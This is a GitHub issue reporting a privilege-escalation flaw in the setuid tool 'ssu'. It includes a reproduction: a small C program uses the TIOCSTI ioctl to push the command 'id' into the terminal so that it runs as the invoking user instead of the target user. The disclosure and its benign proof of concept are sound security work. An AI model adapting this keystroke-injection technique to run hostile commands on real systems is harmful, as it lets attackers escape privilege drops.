Skip to content

[Git master] Vulnerable to privilege escalation using ioctls TIOCSTI and TIOCLINUX #13

Open
@hartwork

Description

@hartwork

Hi!

I believe that ssu is vulnerabily to privilege escalation using ioctls TIOCSTI and TIOCLINUX. Here is how to see it in action:

$ cd "$(mktemp -d)"
$ git clone --depth 1 https://github.com/illiliti/ssu
$ cd ssu/
$ git rev-parse HEAD  # 606a96b542bb16bd1f4c20058477994f75186fc9
$ make
$ sudo chown root:root ./ssu
$ sudo chmod u+s ./ssu
$ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c
#include <sys/ioctl.h>

int main(void) {
  const char *text = "id\n";
  while (*text)
    ioctl(0, TIOCSTI, text++);
  return 0;
}
TIOCSTI_C_EOF
$ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c
$ ./ssu -u nobody /tmp/TIOCSTI  # runs id(1) as ${USER} rather than nobody

Please note that:

Best, Sebastian

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions